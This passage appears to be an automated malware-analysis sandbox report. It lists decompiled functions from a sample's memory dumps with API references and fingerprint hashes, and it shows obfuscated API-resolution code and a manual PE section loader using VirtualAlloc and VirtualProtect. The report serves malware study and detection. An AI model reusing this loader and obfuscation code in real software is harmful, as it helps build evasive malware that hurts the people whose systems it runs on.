				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0021c6e1
0x0021c6e6
0x0021c6f0
0x0021c6fc
0x0021c703
0x0021c706
0x0021c70d
0x0021c711
0x0021c715
0x0021c71c
0x0021c723
0x0021c72a
0x0021c731
0x0021c738
0x0021c751
0x0021c762
0x0021c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762

Strings

/O, xrefs: 0021C6E6

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00211000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00211006
0x00211009
0x0021100c
0x00211011
0x00211016
0x0021101d
0x00211026
0x0021102d
0x00211034
0x0021103b
0x00211047
0x0021104f
0x00211057
0x0021105e
0x00211065
0x0021106c
0x00211073
0x00211077
0x0021108b
0x00211096
0x0021109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096

Strings

[, xrefs: 0021103B

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00214859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00214859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0021485e
0x0021487a
0x0021487d
0x00214884
0x0021488b
0x00214892
0x0021489d
0x002148a0
0x002148ad
0x002148b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002148B7

Strings

[, xrefs: 0021488B

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 10001780, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10001780(intOrPtr* _a4, long _a8) {
				long _t31;
				signed int _t32;
				intOrPtr* _t37;
				void* _t47;
				void** _t48;
				signed int _t52;
				signed int _t55;
				long _t56;

				_t48 = _a8;
				_t56 = _t48[2];
				if(_t56 != 0) {
					_t52 = _t48[3];
					if((_t52 & 0x02000000) == 0) {
						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t52 & 0x04000000) != 0) {
							_t31 = _t31 | 0x00000200;
						}
						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t32);
					} else {
						_t47 =  *_t48;
						if(_t47 == _t48[1]) {
							if(_t48[4] != 0) {
								L7:
								VirtualFree(_t47, _t56, 0x4000); // executed
							} else {
								_t37 = _a4;
								_t55 =  *(_t37 + 0x30);
								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t56 + 1;
				}
			}

0x10001783
0x10001787
0x1000178c
0x10001797
0x100017a0
0x100017f9
0x10001806
0x10001808
0x10001808
0x10001815
0x1000181d
0x10001824
0x100017a2
0x100017a2
0x100017a7
0x100017ad
0x100017c6
0x100017cd
0x100017af
0x100017af
0x100017b2
0x100017ba
0x00000000
0x00000000
0x100017ba
0x100017ad
0x100017db
0x100017db
0x1000178e
0x10001793
0x10001793

APIs

VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
Instruction ID: f401046966946d9f8f8c45c464924eb5d72016bba8cd02ac906e1c8dccc1d15e
Opcode Fuzzy Hash: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
Instruction Fuzzy Hash: EB11BF327101198BE304DE09E880F9AB3BAFF947A0F46825AF509CB295DB30E951C790

Uniqueness

Uniqueness Score: -1.00%

Function 00224F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00224F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00224f80
0x00224f81
0x00224f82
0x00224f86
0x00224f87
0x00224f8c
0x00224fa5
0x00224fa8
0x00224faf
0x00224fb6
0x00224fc7
0x00224fca
0x00224fd7
0x00224fe2
0x00224fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2

Strings

{#lm, xrefs: 00224FC2

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 10001620, Relevance: 2.6, APIs: 2, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t30;
				signed int _t31;
				void* _t38;
				void* _t49;
				void* _t51;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr _t55;
				long _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t65;
				long _t66;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t75;
				long* _t77;
				void* _t78;

				_t30 = _a16;
				_t55 =  *_t30;
				_t68 =  *((intOrPtr*)(_t30 + 4));
				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
				_v8 = _t68;
				_v12 = 0;
				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
					L15:
					return 1;
				} else {
					_t65 = VirtualAlloc;
					_t7 = _t55 + 0x28; // 0x28
					_t77 = _t7 + _t31;
					do {
						_t56 =  *_t77;
						if(_t56 != 0) {
							if(_a8 < _t77[1] + _t56) {
								SetLastError(0xd);
								goto L17;
							} else {
								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
								if(_t38 == 0) {
									goto L17;
								} else {
									_t66 =  *_t77;
									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
									_t70 = _t77[1] + _a4;
									if(_t66 != 0) {
										_t49 = _t51;
										_t75 = _t70 - _t51;
										do {
											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
											_t49 = _t49 + 1;
											_t66 = _t66 - 1;
										} while (_t66 != 0);
									}
									 *(_t77 - 8) = _t51;
									goto L13;
								}
							}
						} else {
							_t54 =  *(_a12 + 0x38);
							if(_t54 <= 0) {
								goto L14;
							} else {
								_push(4);
								_push(0x1000);
								_push(_t54);
								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
								if( *_t65() == 0) {
									L17:
									return 0;
								} else {
									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
									 *(_t77 - 8) = _t72;
									if(_t54 != 0) {
										_t58 = _t54;
										_t59 = _t58 >> 2;
										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
										_t78 = _t78 + 0x18;
									}
									L13:
									_t68 = _v8;
									_t65 = VirtualAlloc;
									goto L14;
								}
							}
						}
						goto L18;
						L14:
						_t53 = _v12 + 1;
						_t77 =  &(_t77[0xa]);
						_v12 = _t53;
					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
					goto L15;
				}
				L18:
			}

0x10001626
0x1000162a
0x1000162e
0x10001631
0x10001637
0x1000163a
0x10001645
0x1000170a
0x10001713
0x1000164b
0x1000164b
0x10001651
0x10001654
0x10001656
0x10001656
0x1000165a
0x100016ab
0x10001718
0x00000000
0x100016ad
0x100016bb
0x100016bf
0x00000000
0x100016c1
0x100016c4
0x100016c6
0x100016cb
0x100016d0
0x100016d2
0x100016d4
0x100016d6
0x100016d9
0x100016db
0x100016de
0x100016de
0x100016d6
0x100016e1
0x00000000
0x100016e1
0x100016bf
0x1000165c
0x1000165f
0x10001664
0x00000000
0x1000166a
0x1000166d
0x1000166f
0x10001674
0x10001677
0x1000167c
0x10001720
0x10001726
0x10001682
0x10001685
0x10001688
0x1000168d
0x1000168f
0x10001693
0x1000169f
0x1000169f
0x1000169f
0x100016e4
0x100016e4
0x100016e7
0x00000000
0x100016e7
0x1000167c
0x10001664
0x00000000
0x100016ed
0x100016f5
0x100016fa
0x100016fd
0x10001700
0x00000000
0x10001656
0x00000000

APIs

VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0022976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00229772
0x00229773
0x00229778
0x0022977a
0x0022977b
0x0022977e
0x0022977f
0x00229782
0x00229785
0x00229788
0x00229789
0x0022978c
0x0022978f
0x00229790
0x00229791
0x00229794
0x00229797
0x0022979a
0x0022979d
0x002297a0
0x002297a3
0x002297a6
0x002297a7
0x002297a8
0x002297ad
0x002297b7
0x002297c3
0x002297ca
0x002297d1
0x002297d8
0x002297df
0x002297e3
0x002297fc
0x00229816
0x0022981d

APIs

CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0021B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0021602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0021b569
0x0021b56a
0x0021b56d
0x0021b572
0x0021b574
0x0021b577
0x0021b57a
0x0021b57d
0x0021b580
0x0021b583
0x0021b586
0x0021b587
0x0021b58a
0x0021b58d
0x0021b590
0x0021b593
0x0021b594
0x0021b595
0x0021b59a
0x0021b5a4
0x0021b5b8
0x0021b5c0
0x0021b5c4
0x0021b5cb
0x0021b5d2
0x0021b5d9
0x0021b5e6
0x0021b5fd
0x0021b604

APIs

CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0022981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00229821
0x00229822
0x00229825
0x00229828
0x0022982a
0x0022982c
0x0022982f
0x00229832
0x00229835
0x00229836
0x00229837
0x0022983c
0x00229855
0x00229858
0x0022985f
0x00229866
0x0022986d
0x00229874
0x0022987b
0x0022988e
0x0022989b
0x002298a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00227BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00227bf7
0x00227bf8
0x00227bfa
0x00227bfd
0x00227bff
0x00227c02
0x00227c06
0x00227c07
0x00227c0f
0x00227c1d
0x00227c25
0x00227c2d
0x00227c31
0x00227c38
0x00227c3f
0x00227c46
0x00227c4a
0x00227c5e
0x00227c67
0x00227c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0021F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0021f662
0x0021f663
0x0021f665
0x0021f668
0x0021f66a
0x0021f66d
0x0021f670
0x0021f673
0x0021f677
0x0021f678
0x0021f67d
0x0021f687
0x0021f693
0x0021f69a
0x0021f6a1
0x0021f6a5
0x0021f6a9
0x0021f6b0
0x0021f6c9
0x0021f6d8
0x0021f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0021B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0021602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0021b6f3
0x0021b6f8
0x0021b702
0x0021b70b
0x0021b712
0x0021b719
0x0021b720
0x0021b727
0x0021b72e
0x0021b747
0x0021b759
0x0021b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61

Uniqueness

